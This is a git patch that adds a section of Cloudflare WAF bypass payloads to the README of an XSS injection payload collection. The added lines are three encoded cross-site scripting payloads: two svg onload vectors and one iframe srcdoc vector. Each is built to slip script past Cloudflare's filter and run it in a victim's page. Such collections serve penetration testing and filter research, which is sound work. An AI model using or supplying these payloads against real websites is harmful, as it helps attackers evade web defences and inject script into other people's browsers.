From edcac293a860ce3182f3124f43d8facf7e7487b0 Mon Sep 17 00:00:00 2001
From: h1-ragnar <51418565+h1-ragnar@users.noreply.github.com>
Date: Wed, 5 Jun 2019 21:36:41 +0300
Subject: [PATCH] Cloudflare XSS Bypasses by Bohdan Korzhynskyi

---
 XSS Injection/README.md | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 7a10f49..af9da31 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -876,6 +876,14 @@ Works for CSP like `script-src self`
 
 ## Common WAF Bypass
 
+### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019
+
+```html
+<svg onload=prompt%26%230000000040document.domain)>
+<svg onload=prompt%26%23x000000028;document.domain)>
+xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
+```
+
 ### Cloudflare XSS Bypass - 22nd march 2019 (by @RakeshMane10)
 
 ```